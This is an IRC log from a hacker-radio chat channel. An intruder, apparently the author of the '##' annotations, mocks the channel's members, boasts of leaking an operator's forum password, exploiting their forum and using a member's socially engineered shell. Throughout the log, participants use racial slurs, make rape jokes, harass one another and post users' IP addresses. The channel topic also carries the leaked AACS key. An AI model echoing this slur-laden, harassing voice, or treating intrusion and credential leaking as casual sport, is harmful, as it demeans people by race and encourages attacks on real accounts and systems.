13:18 <&SHAGGSTaRR> gb2msn
13:18 <&SHAGGSTaRR> j/k :P
13:18 <&Vesalius> not as if he rms it'll be fun
13:18 <+cybereagle> you should let him, it will be fucking funny going
over the logs to see how noobily he went about the process of pwning ##LOL
13:18 <&Vesalius> *won't
13:19 <+Jordan> Hey Zak Hey everyone
13:19 <&Vesalius> cybereagle, also I enjoy reinstalling =]
13:19 <+cybereagle> ok, thats a little odd
13:19 <+cybereagle> lol
13:19 <+Zakolus> XD
13:19 <+Zakolus> Reinstall fetish
13:19 <+DesertRose> wow
13:19 * DesertRose just read up
13:19 <+DesertRose> what a frigging asshole
13:19 <&Vesalius> FFS
13:19 <&SHAGGSTaRR> OOH BABY I LOVE HOW YOU SLIP INTO MY FRESHLY FORMATED
PARTITIONS
13:19 <&SHAGGSTaRR> XD
13:19 <+DesertRose> see, dinner is always badly timed when I'm on irc
13:19 <+Zakolus> XD
13:20 <+DesertRose> lmfao Shagg
13:20 <+Zakolus> afk for some fewd
13:20 <&SHAGGSTaRR> I've just finished my slasa source so I have no dip
for the pringles
13:20 <&SHAGGSTaRR> Not a happy bunny =/
13:20 <&SHAGGSTaRR> No wait, not even a bunny, what am I on about?
13:21 <+Jordan> lol ermm wonder if i have new pringles i ate some last
night texas bbq sauce flavour nice
13:21 <&SHAGGSTaRR> I wish I had those instead of sour cream and onion
13:21 <+Zakolus> msn = htek?
13:21 <+Jordan> go buy some then theyre nice
13:21 <+Zakolus> l0l*
13:22 <&SHAGGSTaRR> oh yeah how was prom dude?
13:22 <+l0l> Zakolus: i dont think so. are you stalkin me dude?
13:22 <+Zakolus> ...
13:22 <+Jordan> is that me shagg? if so amazing
13:22 <&SHAGGSTaRR> yeah you obviously
13:22 <+Zakolus> No, we just had someone come in here making threats, and
you could possibly be them
13:23 <+Jordan> oh lol its not me
13:23 * Jordan hides
13:23 <&SHAGGSTaRR> I found that word I couldnt remember
13:23 <+l0l> no worries, aint me
13:23 <&SHAGGSTaRR> consistant
13:23 <+Zakolus> ah. okay.
13:23 <&SHAGGSTaRR> I was sat here thinking of nothing and it just hit me
13:23 <&SHAGGSTaRR> I hate it when things like that happen
13:23 <+cybereagle> i love it but i hate it
13:23 <+cybereagle> its funny as hell
13:23 <+cybereagle> but it also frustrates me
13:23 -!- _hyper_ [hyper@members.hackervoice.co.uk] has joined #hvr
13:23 -!- mode/#hvr [+oa _hyper_ _hyper_] by ChanServ
13:23 <&SHAGGSTaRR> I sat here thinking "FUCK, THIS WORD IS STOPPING ME
GETTING WORK DONE HERE.. WHAT COULD IT BE"
13:24 <+DesertRose> I hate that... it's soo counter-productive
13:24 <&SHAGGSTaRR> 20 mins of irc and some pringles later "CONSISTANT"
"Where'd that come from???!"
13:24 <&Vesalius> lol
13:24 <&Vesalius> * htek has quit (User has been permanently banned from
THVNet (nope))
13:24 <&SHAGGSTaRR> 'lo hype/viper
13:24 <&SHAGGSTaRR> hyper*
13:24 <&Vesalius> Be|ia|, naxxtor, you might want to update the forums
##0D4Y
13:25 <&_hyper_> to what?
13:25 <&SHAGGSTaRR> there's a moose
13:25 <&SHAGGSTaRR> loose
13:25 <&SHAGGSTaRR> in the hoose
13:25 <&Vesalius> _hyper_, some guy with an IPB exploit
13:25 <&_hyper_> heh cool
13:26 <&SHAGGSTaRR> Ves if you get a shedload of pms then it's probably
the ykstort one
13:26 <&Vesalius> he posted my forum password in here #LOL I CRY WITH
LAUGH
13:26 <&Vesalius> SHAGGSTaRR, Ykstort?
13:26 <+Zakolus> there weren't any PMs when I was on
13:26 <&SHAGGSTaRR> I tried to make a thread from your account that said
"Disregard my posts, I suck cocks."
13:26 <&SHAGGSTaRR> But didnt have the heart to pwn you so much
13:26 <&Vesalius> lol
13:26 <+Zakolus> XD
13:26 <+l0l> dude
13:26 <+l0l> pwnage is neccessary
13:26 <+l0l> its the way of t3h int4rw3bz
13:27 <&SHAGGSTaRR> nah I respect ves
13:27 <+Zakolus> orly
13:27 <&SHAGGSTaRR> because he didnt leave me and jojo stranded in brum
mainly
13:27 <&Vesalius> /node
13:27 <&Vesalius> -e
13:27 <&Vesalius> and I can /gline & /kill
13:27 <&Vesalius> =]
13:27 <+l0l> are you a gay couple?
13:27 <&SHAGGSTaRR> And he only tried to rape me twice at night, far less
than expected.
13:27 <&_hyper_> brb
13:27 * DesertRose pulls out the video camera again
13:27 <+l0l> use rapex
13:27 <+l0l> and a knife
13:27 <+Zakolus> psg, are you on the forums?
13:28 <&Vesalius> I didnt try and rape anyone
13:28 <&Vesalius> I was trying to sleep through _hyper_'s snoring
13:28 <+DesertRose> what, you succeeded? ;p
13:28 <+l0l> rape is fun
13:28 * Vesalius can still remember _hyper_ in the morning when he looked
around for me
13:28 <&Vesalius> lol
13:28 <+psg> [19:31] <psg> I'd change your password on HVR. ##psg giving
advice wow, shame no one is ever going to listen to you again
13:28 <+x4e> yeah next time you wake up with a used rubber hanging out our
ass im sure you gonna think that l0l :D
13:28 <+psg> <psg> And change all passwords that match it on other sites
with your nick. #DUHH
13:28 <+psg> ;)
13:28 <+Zakolus> ah, yeah..
13:29 <+l0l> x4e: its not me who _is_ raped
13:29 <&Vesalius> naxx : "Yeah vesalius climbed on the roof and dropped
the pmr"
13:29 <+l0l> x4e: you got that part wrong. sorry, but you fail.
13:29 <&Vesalius> * _hyper_ looks around frantically
13:29 <&Vesalius> lol
13:29 <+Zakolus> psg, I don't use that password on any other sites.. xD
#liar, your mail is lol.
13:29 <&Vesalius> psg, I dont have any that are the same =] # AGAIN, LYING
TO SAFE FACE
13:29 <+Zakolus> XD
13:29 <&Vesalius> and I changed it =]
13:29 <+l0l> <&Vesalius> psg, I dont have any that are the same =]
13:29 <+psg> me either. #HAH
13:29 <+l0l> they all say that.
13:30 <+psg> :P
13:30 <&Vesalius> l0l, I don't
13:30 <+l0l> you just ddi.
13:30 <&Vesalius> I didn't know it was mine lol
13:30 <+x4e> was only 3 char anyway ves? i could of guessed that in 3 :D
13:30 <&Vesalius> firefox has updated my password on the forums
13:30 <&Vesalius> for almost dunno
13:30 <&Vesalius> a long time
13:30 <&Vesalius> s/updated/inserted/
13:31 <&SHAGGSTaRR> so how do you log in if you're not at THAT computer?
13:31 <&SHAGGSTaRR> if you cant remember your pass
13:31 <&_hyper_> sorry back now#
13:31 <+Zakolus> wb
13:31 <&_hyper_> ty
13:32 <&Vesalius> SHAGGSTaRR, I don't
13:32 <&Vesalius> im hardly ever at another computer
13:32 <&Vesalius> infact
13:32 <&Vesalius> I never am
13:32 <&SHAGGSTaRR> You're missing out on one of the key brilliances of
the intertubes then.
13:32 <&SHAGGSTaRR> Being able to take your shit with you no matter where
you might happen to land yourself.
13:33 <&Vesalius> thats what the laptop is for
13:33 <+DesertRose> Shagg, was it you who was in like.... Portugal, I
think
13:33 <+DesertRose> and said you went to the internet cafe across the
street from the hotwl
13:33 <&SHAGGSTaRR> What if you pwnd a machine (that wasn't an led
display) at brumhv and wanted to post from it?
13:33 <+DesertRose> *hotel
13:33 <&SHAGGSTaRR> yeah, it was spain.
13:33 <+DesertRose> ah Spain
13:34 <&Vesalius> SHAGGSTaRR, machine or led display..
13:34 <&Vesalius> whats the obvious choice?
13:34 <+DesertRose> right, was just wondering if that was you or someone
else, heh
13:34 <&SHAGGSTaRR> Touche =/
13:34 <&SHAGGSTaRR> Timboss went to portugal
13:34 <+DesertRose> yeah
13:34 <+DesertRose> I remember now
13:34 <&SHAGGSTaRR> Ves what if you weren't in Craplins then?
13:34 <&Vesalius> id go to there
13:34 <&SHAGGSTaRR> lol
13:35 <&SHAGGSTaRR> What if you wanted to prove some amazingly leet shit
and post FROM THE LED DISPLAY?
13:35 <&Vesalius> then if I could do that I could get my password somehow
13:35 <&SHAGGSTaRR> How?
13:35 <&Vesalius> how would I post from the led display?
13:36 <+x4e> or use someone elses credentials @ vesalius
13:36 <&SHAGGSTaRR> ssh into your box and run through your firefox cookies
with a text editor?
13:36 <&Vesalius> SHAGGSTaRR, not a bad idea..lol
13:36 <&Vesalius> except
13:36 <&SHAGGSTaRR> Or you could just remember your passwords...
13:36 <&Vesalius> ipb doesnt store pwds in cookies #l0l
13:36 <&SHAGGSTaRR> If you don't someone else will ;P
13:36 <&SHAGGSTaRR> How does it then?
13:36 <&Vesalius> that password was a random password
13:36 <&Vesalius> from my tfom.net login info # wait, I thought you didn't
re-use nigger?
13:37 <&SHAGGSTaRR> openid?
13:37 <&Vesalius> ?
13:37 <&SHAGGSTaRR> Where you store your shit on either your server or a
dedicated openif box
13:37 <&Vesalius> this machine
13:37 <&SHAGGSTaRR> and the server you wanna log into runs a check with
your openid host and checks you are who you say you are
13:38 <&SHAGGSTaRR> meant to make the whole process more streamlined but
I've not looked into it too much
13:38 <&SHAGGSTaRR> I might host openflid for myself and jojo if it
actually kicks off
13:39 <&Vesalius> great
13:39 <&Vesalius> I have blue tak stuck in my ear
13:40 <&SHAGGSTaRR> http://openid.net/
13:40 <&Vesalius> thats better
13:40 <&SHAGGSTaRR> Better than having muftak on yout IRC
13:40 <&SHAGGSTaRR> >_>
13:40 <&SHAGGSTaRR> <_<
13:43 <+x4e> Anyone know where I can buy individual SecureId's? seems
every site sells them in packs of 5 :S
13:44 <&SHAGGSTaRR> Your best bet would be a shoop
13:44 <&SHAGGSTaRR> A shop even
13:44 <&SHAGGSTaRR> no
13:44 <&SHAGGSTaRR> a shoop
13:44 <&SHAGGSTaRR> Shoop da whoop for a pack de uno
13:44 <+x4e> which shoop? :)
13:44 <&SHAGGSTaRR> No idea, you'd deffo know better than me
13:44 <&SHAGGSTaRR> But for the fact that even if they sell in packs of 5
or so only
13:45 <&SHAGGSTaRR> you can say to the store guy "Hey, can I just 'ave one
please mate?"
13:45 <+x4e> hmm could try :D
13:45 <&SHAGGSTaRR> Like how I bought 3 single dvds instead of the whole
pack of ten yesterday
13:45 <+x4e> Anyone got any spare (steal from work?) SecureId's ?
13:46 <&SHAGGSTaRR> I have an NHS ID holder to go round your neck
13:46 <&SHAGGSTaRR> And probably the id
13:46 <+x4e> see thats not really the same thing shaggstar
13:46 <&SHAGGSTaRR> I also know I could use my library cards outer
lamination over a self made ID in there
13:46 <+x4e> unless i want to be a pretend gynocologist
13:46 <&SHAGGSTaRR> hmm so what exactly are these things you're after?
13:46 <&SHAGGSTaRR> I don't need to pretend.
13:46 <&SHAGGSTaRR> I hang with you minges all day.
13:47 <&SHAGGSTaRR> hmm so what exactly are these things you're after?
13:47 <+x4e> http://www.rsa.com/node.aspx?id=1156
13:50 <+Zakolus> afk, gotsta takes a powa showa
13:51 <&Vesalius>
http://www.wikitruth.info/index.php?title=Brian_Peppers_Day
13:54 -!- Zakolus [0x5A616B@thv-8D866938.bna.bellsouth.net] has quit [Ping
timeout]
13:56 -!- Zakolus [0x5A616B@thv-7BE41BC5.ard.bellsouth.net] has joined
#hvr
13:56 -!- mode/#hvr [+v Zakolus] by ChanServ
13:58 <+Timboss> [19:37] <SHAGGSTaRR> Timboss went to portugal
13:58 <+Timboss> yeah i did
13:59 <+Timboss> went for a month travelling
13:59 <+Timboss> went to the largest phycadelic festival in europe while i
was there
13:59 <+Timboss> best travel holiday ever...
13:59 * Timboss goes back to work
14:03 <@zinya-> why the fuck would anyone want a winblows skin for their
gp2x?
14:04 <+Jordan> do u have a gp2x?
14:04 <+psg> zinya: homesick
14:04 * psg ducks.
14:06 <&_hyper_> right gotta das
14:06 <&_hyper_> h
14:06 <+Zakolus> cya
14:06 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit:
Leaving]
14:09 -!- JohnDownings [John.downi@87957328.17CFA09A.A68D6B36.IP] has
joined #hvr
14:10 <+Zakolus> >.>
14:10 < JohnDownings> Umm...Hello?
14:10 <+Zakolus> hi
14:10 -!- mode/#hvr [+v JohnDownings] by Vesalius
14:10 <@zinya-> shaman, i need help
14:10 <+JohnDownings> Hi im new to this so bear with me, is there someone
i could talk to about your site here? i havn't used "IRC" before
14:11 <+Zakolus> Sure, whats up John?
14:11 <+psg> Isn't attempted social engineering wonder. ##LOL PSG IS ON TO
ME, OH NO :|
14:11 <+Zakolus> psg, what do you mean?
14:11 <+psg> oh nothing.
14:11 <+Zakolus> okay..
14:12 <+JohnDownings> Im doing research on hacking and the 'state' of the
internet at school. According to my teacher I need some views from both
sides.
14:12 <+Zakolus> okay..
14:12 <+JohnDownings> So I thought why not try and talk to some "hackers"
14:12 <+Zakolus> lulz
14:13 <&Vesalius> lolz
14:13 <&Vesalius> JohnDownings, rule 1. INTERNETS R LAW
14:13 <&Vesalius> kthnx
14:13 <+Zakolus> Vesalius, is that the biggest load of crap you've ever
heard?
14:13 <&Vesalius> ..?
14:13 <+Zakolus> this guy, John, says he is reporting on "hacking"
14:13 <+Zakolus> rofl
14:13 <+JohnDownings> No im not reporting
14:14 <+Zakolus> whatever
14:14 <+JohnDownings> Im writing a school report
14:14 <+psg> More believable. Good start. Poor execution sir.
14:14 <+Zakolus> psg, this is htek, isn't it.
14:14 <+psg> I would imagine so.
14:14 <+Zakolus> heh.
14:14 <&Vesalius> if he really isn't htek then you'd all feel bad
14:14 <+Zakolus> feel bad about what?
14:14 <&Vesalius> nvm
14:14 <+psg> Not especially.
14:15 <&Vesalius> JohnDownings, no hackers here ##HAHAHA YOU GOT DAT RIGHT
NIG
14:15 <@zinya-> does everyone connecting get masked ip?
14:15 <+Zakolus> Yes.
14:15 <@zinya-> woah that was bad english
14:15 <+JohnDownings> I swear on my valve accounts life I have no idea
what on earth you are talking about
14:15 <+Zakolus> I understood it..
14:15 <&Vesalius> valve..
14:15 <+Zakolus> John, how can you know what "valve" is and not what "IRC"
is..
14:15 <+Zakolus> Do you seriously think we are that stoopid?
14:15 <&Vesalius> I know what IRC is
14:15 <&Vesalius> WTF IS VALVE
14:16 <@zinya-> lol
14:16 <+JohnDownings> lol
14:16 <@oOJINxOo_> steam* i think he means
14:16 <@zinya-> someone says valve, i think half-life
14:16 <&Vesalius> JohnDownings, there was this really really amazing
hacker in here earlier though
14:16 <+Zakolus> yeah. same here.
14:16 <&Vesalius> his name was htek
14:16 <&Vesalius> he was pwning us left right and center
14:16 <+JohnDownings> Does nobody want to speak to me? I only have a few
questions
14:16 <&Vesalius> until he got glined
14:17 <+Zakolus> Noone wants to talk John, go away..
14:17 <&Vesalius> Zakolus, be nice
14:17 <+Zakolus> >.>
14:17 <+psg> john: try #cdc on efnet ## STILL NO HACKERS THERE :/
14:17 <&Vesalius> we dont really have much proof he is infact htek
14:17 <+Zakolus> still, I don't think anyone wants to talk..
14:17 <+JohnDownings> What is that psg?
14:17 <&Vesalius> hmm
14:17 <+psg> an irc channel?
14:18 <+psg> wait sorry "irc"
14:18 <&Vesalius> JohnDownings, how did you get on irc?
14:18 <+psg> I am not a hacker... i am a marketeer.
14:18 <+psg> :P
14:18 <&Vesalius> JohnDownings, did you install just mIRC?
14:18 <&Vesalius> because you are connected via SSL
14:19 <+Zakolus> >.>
14:19 <+Zakolus> ;-;
14:19 <&Vesalius> HAHAHAHHAHAHAHA
14:19 <&Vesalius> JohnDownings, you are htek
14:19 <&Vesalius> tfom@TFOM:~$ host 80.159.79.222
14:19 <&Vesalius> Host 222.79.159.80.in-addr.arpa not found: 3(NXDOMAIN)
14:19 <&Vesalius> check that host
14:19 -!- JohnDownings [John.downi@87957328.17CFA09A.A68D6B36.IP] has quit
[User has been permanently banned from THVNet (evading..GTFO COON)]
14:19 <+n0x> JohnDownings> Anyway, I goto college in East London
14:19 <&SHAGGSTaRR> 204.10.111.201
14:19 <+psg> He'll be at that a while.
14:19 <&SHAGGSTaRR> thats the ip he was using before
14:19 <&Vesalius> yup
14:19 <+n0x> yea we are from the uk.. we know where lancashire is
14:20 <+psg> That might well be lulling you into a false sense of security
14:20 <+psg> i'd do it badly once or twice
14:20 <+psg> wait a few hours... then have a real go ##GOOD IDEA PSG, BUT
I ALREADY OWNED THESE FAGS
14:20 <+psg> ;)
14:20 <&Vesalius> if hes black
14:20 <&Vesalius> hes gonna be pissed at me
14:20 <+psg> or am i giving the kid too much credit?
14:20 <+psg> he reminds me of me when I was 14 ### ROFLLLZ im going to use
that insult, possibly make a tshirt "YOUR LIKE PSG WHEN HE WAS 14" LOL LOL
14:20 <+n0x> vesalius, so..?
14:20 <+psg> :|
14:21 <+Zakolus> :|
14:21 <&Vesalius> good point
14:21 <&Vesalius> for a start he was on IRC
14:21 <&Vesalius> and for someone with no knowledge of anything like that
14:21 <&Vesalius> how'd he install the SSL components..
14:21 <+n0x> vesalius, you can buy "coon cheese" in australia ;)
14:22 <+Zakolus> XO
14:22 <&Vesalius> lol
14:22 <+Zakolus> ROFL @ the ZipCode for his original IP is 33137
14:22 <&Vesalius> ?
14:22 <+Zakolus> so close, yet, so far
14:23 <+Zakolus> PostalCode: 33137
14:23 <+Zakolus> in america, they are called ZipCode..
14:23 <+Zakolus> afk for a sec.
14:23 <@muftak> bah, there isn't a 31337 zipcode
14:24 <&Vesalius> I know they are called ZipCodes
14:24 <+BOfH> What's a zipcode?
14:24 <+BOfH> Is it a serial number on a device that keeps your trousers
up?
14:24 <&Vesalius> BOfH, they don't have them in nigeria
14:24 <&Vesalius> so you wouldn't know =]
14:25 <&Vesalius> = p
14:25 <@muftak> i want to live in the place with the postcode E1 3ET
14:25 <&SHAGGSTaRR> lol
14:25 <&SHAGGSTaRR> Sounds mexical
14:25 <&SHAGGSTaRR> el eet
14:25 <&SHAGGSTaRR> el leeto
14:25 <&Vesalius> hahaha
14:25 <@muftak> i will buy it when i win the lottery
14:26 <+Zakolus> s/when/if
14:26 -!- tfom [~tfom@thv-1DCD6AC2] has joined #hvr
14:26 -!- tfom is now known as SUPERDUPERHACKERMAN
14:26 -!- mode/#hvr [+v SUPERDUPERHACKERMAN] by SHAGGSTaRR
14:26 <+Zakolus> >.>
14:26 <&Vesalius> ?
14:26 <&SHAGGSTaRR> SUPERDUPERHACKERMAN is on Ves's lan?
14:26 <&Vesalius> ..
14:26 <&Vesalius> =S
14:27 <&SHAGGSTaRR> Looks like it from the short hostmask
14:27 <+Zakolus> lolhax
14:27 <&Vesalius> thats not good is it?
14:27 <+Zakolus> No, its not xD
14:27 <+SUPERDUPERHACKERMAN> Zakolus is right
14:27 <+SUPERDUPERHACKERMAN> its not
14:27 <&SHAGGSTaRR> If you know what it is then sure
14:27 <&Vesalius> ¬_¬
14:27 <&SHAGGSTaRR> But if that's not you Ves
14:27 <&Vesalius> of course its me
14:27 <+SUPERDUPERHACKERMAN> you coon
14:28 -!- SUPERDUPERHACKERMAN [~tfom@thv-1DCD6AC2] has quit
[[irc.tfom.org] Local kill by Vesalius (no racism kthnx coon)]
14:28 <+Zakolus> XD
14:28 <&Vesalius> lol
14:28 <&Vesalius> /kill'd from my own server
14:28 <&SHAGGSTaRR> "No racism and no niggers" woulda been funnier
14:28 <+Zakolus> AHHHHH @ the tv is too loud
14:28 <+Zakolus> brb
14:29 <@muftak> SHAGGSTaRR: that should be the topic
14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE
RADIOOOO | #brumhv..EVERYONE LEAVE BIRMINGHAM!!! | 09 F9 11 02 9D 74 E3 5B
D8 41 56 C5 63 56 88 C0 | <naxxtor> we should have sajoin'd shaggstar and
jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u
teh stream | <htek> i am jealous of your life | No racism and no nigge
14:29 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:29 <&Vesalius> NIGGE
14:29 <&Vesalius> KILL THE NIGGES
14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE
RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | <naxxtor> we
should have sajoin'd shaggstar and jojo into the pub |
http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | <htek> i
am jealous of your life | No racism and no nigge
14:29 <&Vesalius> htek, how many times
14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE
RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | <naxxtor> we
should have sajoin'd shaggstar and jojo into the pub |
http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | <htek> i
am jealous of your life | No racism and no niggers
14:29 < htek> wait ## logged in from naxxtors SE'd shell LOL
14:29 <&Vesalius> must I raep you from the server?
14:29 < htek> im on naxxtors box
14:29 < htek> dont gline me
14:30 <&SHAGGSTaRR> Lets hear him out
14:30 <&SHAGGSTaRR> For the lulz
14:30 <+Zakolus> yeah... XD
14:30 <&Vesalius> oh shite
14:30 <&Vesalius> I can't gline him..hmm
14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all
channels]
14:30 <&Vesalius> oops
14:30 -!- DesertRose [RetroJade5@thv-E9E348F8.alshamil.net.ae] has quit
[Quit: <Kremit> but every once in a while, i wish i had a really hot
sister. <Kremit> whose face I could incest up.]
14:30 <&SHAGGSTaRR> LOL WHAT
14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:30 <&SHAGGSTaRR> * htek (m4tr1x@thv-52CF79AD.plus.com) has left #hvr
(Left all channels)
14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all
channels]
14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all
channels]
14:31 <&Vesalius> lol
14:31 <+Zakolus> o_o
14:31 <&SHAGGSTaRR> htek == m4tr1x ##WELL DONE EINSTEIN
14:31 <&Vesalius> yup
14:31 <&SHAGGSTaRR> XD
14:31 <+Zakolus> Ahh. xD
14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all
channels]
14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:31 <&SHAGGSTaRR> BRING IT BACK
14:31 < htek> battle of the up key
14:31 < htek> WOOT
14:31 <&SHAGGSTaRR> SING IT BACK
14:31 < htek> winner
14:31 < htek> lol
14:31 <&Vesalius> htek, gtfo coon
14:32 <&Vesalius> htek, leave or be leaved
14:32 <&Vesalius> kthnx
14:33 <&Vesalius> htek, have anything to say before I gline you?
14:33 <+n0x> arguing on the intarwebs, even if you win, you're still a
retard!
14:33 < htek> yes
14:33 <&Vesalius> what?
14:33 < htek> that John character seriously wasnt me
14:33 < htek> as much as i hate psg ##YES
14:33 <&Vesalius> htek, you
14:33 -!- htek was kicked from #hvr by muftak [I wish I was gay like
Vesalius ]
14:33 <&Vesalius> are a FUCKING fool
14:34 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr
14:34 <&Vesalius> then how do you know about him
14:34 <&Vesalius> dipshit?
14:34 <+n0x> wait... how did he know about "john"
14:34 < htek> lol, im not here on my own
14:34 < htek> "dipshit"
14:34 <&Vesalius> okay
14:34 <&Vesalius> htek, any last words?
14:34 < htek> thats the only reason i came back now on naxx's boix
14:34 <&Vesalius> the gline is coming =]
14:34 <&SHAGGSTaRR> To say that you're not john?
14:35 < htek> yea, i thought it was damn funny
14:35 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has quit [User has been
permanently banned from THVNet (no reason)]
14:35 <&SHAGGSTaRR> Wasn't that whole john thing happenening when you
weren't even around?
14:35 <@muftak> i'm john, and so is my wife
14:35 <&Vesalius> GLINE
14:35 <&SHAGGSTaRR> MY KIDS NAME'S HONDA
14:35 <&SHAGGSTaRR> MY WIFES NAME'S HONDA
14:35 <&SHAGGSTaRR> MY FIRST WORDS
14:35 <&SHAGGSTaRR> HONDA
14:36 <&SHAGGSTaRR> WHOOOAAAAAW THIS HONDA'S BLACK
14:36 <&SHAGGSTaRR> LIKE MY WIFE
14:36 * Vesalius waits for him to come back
14:37 <&Vesalius> according to his whois
14:37 <&Vesalius> he is on the same machine as naxxtor
14:37 <&SHAGGSTaRR> He's still here
14:37 <&SHAGGSTaRR> hmm he's gone
14:37 -!- belial [belial@thv-C1670C73.bethere.co.uk] has joined #hvr ##YAY
the fatty is in the house
14:37 < belial> hello
14:37 < belial> i cant use my main machine coz its being used by femail
14:37 < belial> so whats beeing going on?
14:38 <+Jordan> some htec prick been fucking around
14:38 <+Jordan> htek*
14:38 < belial> ok
14:38 <+psg> he is still here
14:38 <+psg> l0l
14:38 <+psg> ;)
14:38 < belial> well im well aware that we are running an out of date
forum
14:38 -!- Zako [0x5A616B@thv-B0395498.ard.bellsouth.net] has joined #hvr
14:38 -!- htek [~tfom@B1223523.114FEC1A.2F9399C7.IP] has joined #hvr
14:38 < Zako> whoops
14:38 <+Jordan> and hes back
14:38 < Zako> X3
14:38 < Zako> >.>
14:38 <+cybereagle> hahaha
14:38 <+cybereagle> well that was predictable
14:38 < htek> you lot are idiots =P
14:39 <+cybereagle> whys that?
14:39 < htek> ...
14:39 < htek> learn the wonders of /whois
14:39 <+cybereagle> i'm just in an irc channel
14:39 <+Jordan> thanks but im sure your the biggest one of the lot
14:39 <+cybereagle> ok wtf?
14:39 < belial> htek, what makes you want to abuse people?
14:39 < htek> lol
14:39 < Zako> htek = naxx
14:39 < Zako> ?
14:39 < htek> this isn't htek
14:39 -!- Zakolus [0x5A616B@thv-7BE41BC5.ard.bellsouth.net] has quit [Ping
timeout]
14:39 < htek> ¬_¬
14:39 < htek> <-- Vesalius
14:39 < Zako> o rly? xD
14:39 <+cybereagle> well, you have the nick htek
14:39 <&Vesalius> yesrly
14:39 <+cybereagle> that means we abuse you
14:40 <+cybereagle> open wide
14:40 <+cybereagle> :D
14:40 <&Vesalius> lol
14:40 < Zako> XD
14:40 <&Vesalius> XD
14:40 -!- Zako is now known as Zakolus
14:40 < belial> i fucking give up
14:40 <&Vesalius> its so if he comes back he'll be pissed that someones
taken the nick
14:40 -!- belial [belial@thv-C1670C73.bethere.co.uk] has quit [Quit:
leaving]
14:40 <+cybereagle> i dont think he really will
14:40 < Zakolus> afk
14:40 <&Vesalius> ...
14:40 <+psg> Ves: how long, was it you?
14:40 <+cybereagle> dont try to impress him, really, unless your a defacer
withj leet speak and you know a guy he knows
14:40 <+psg> ;)
14:40 <+cybereagle> he wont be impresed
14:40 <&Vesalius> psg, since I just joined
14:41 <&Vesalius> <belial> i fucking give up
14:41 <&Vesalius> =S
14:41 <+Jordan> i think/hope he'll be back ves
14:41 < htek> gdgd
14:41 <+cybereagle> you could take the most beautiful bit of code and he'd
look at the comment header and say it was lame
14:41 -!- htek [~tfom@B1223523.114FEC1A.2F9399C7.IP] has quit [OMGZ
BAI2U!!1]
14:42 <&Vesalius> why does belial give up?
14:43 <+cybereagle> my theory is, everyone needs a beer
14:43 <&Vesalius> hmm
14:43 <&Vesalius> I dont like beer
14:43 <+Jordan> well u send em us cybereagle
14:44 -!- n0x-- [n0x@thv-438F509A.in-addr.btopenworld.com] has joined #hvr
14:44 -!- n0x-- [n0x@thv-438F509A.in-addr.btopenworld.com] has left #hvr
[Leaving]
14:44 <&SHAGGSTaRR> hibye
14:44 <+n0x> haha
14:45 -!- htek [n0x@thv-438F509A.in-addr.btopenworld.com] has joined #hvr
14:45 -!- mode/#hvr [+v htek] by ChanServ
14:45 <+htek> he won't be using the nick anymore ##oh no, like its my nick
anyway, noob.
14:45 <&Vesalius> hahaha
14:45 <&Vesalius> =]
14:45 <+htek> nickserv is a beautiful thing
14:45 <+psg> msg nickserv kill htek dickfuck
14:45 <&Vesalius> htek, change your nick then =]
14:45 <+cybereagle> Vesalius, you just need good real ale
14:45 -!- Zakolus
[0x5A616B@thv-B0395498.ard.bellsouth.net] has quit [Ping
timeout]
14:45 -!- htek [n0x@thv-438F509A.in-addr.btopenworld.com] has quit [Quit:
Leaving]
14:46 -!- Vesalius is now known as htek
14:46 <&htek> =]
14:46 <+cybereagle> wow, so erm
14:46 -!- htek is now known as Vesalius
14:46 <&Vesalius> does he not understand im a services admin too?
14:46 -!- Jordan is now known as htek
14:46 -!- htek is now known as hteksuckz
14:46 <+cybereagle> now write a snort rule for any irc packet with htek in
and drop it silently
14:46 -!- hteksuckz is now known as Jordan
14:46 <&Vesalius> -NickServ- Nickname htek has been dropped.
14:47 <+cybereagle> imagine that, he owned you with your own nickserv
14:47 <&Vesalius> cybereagle, ?
14:47 <+n0x> btw, it was me that just regged the htek nick
14:47 <&Vesalius> oh
14:47 <&Vesalius> well
14:47 <&Vesalius> that nickname is banned from being registered
14:48 <&Vesalius> kthnx
14:48 <+cybereagle> lol
14:48 <+n0x> ahh even better
14:48 <&Vesalius> oo
14:48 <&Vesalius> I wonder if I can ghost him
14:48 <+cybereagle> where was htek when i was lookig for an excuse to
procastinate my dissertation
14:48 <+cybereagle> nothing like a good pointless rant to keep you
occupied :D
14:49 * Vesalius wants htek to come back
14:49 <+cybereagle> my blood presure thinks he shouldnt, yet my pimp hands
desires it
##A little later on ##
16:09 -!- belial [belial@thv-C1670C73.bethere.co.uk] has joined #hvr
16:09 < belial> the forums are going to be down for a short while ## :(
16:11 <&Vesalius> okay
16:11 <&Vesalius> belial, what was wrong earlier?
16:12 < belial> i was doing like 5 things at the same time as well as
sorting out the vurnablities on the forums
16:12 < belial> so i just got pissed off with that guy or whever he was
16:13 < belial> had to take some offline time to concentrate on what i was
doing
16:13 <&Vesalius> oh sorry
16:13 <&Vesalius> that guy was me
16:13 <&Vesalius> not all the time
16:13 <&Vesalius> but when you were here
16:13 <&Vesalius> and he joined, I connected as him
16:13 <&_hyper_> bololcks
16:14 <&Vesalius> so he couldn't use that nick
16:14 <&_hyper_> just finished writing a massive post
16:14 <&_hyper_> >:(
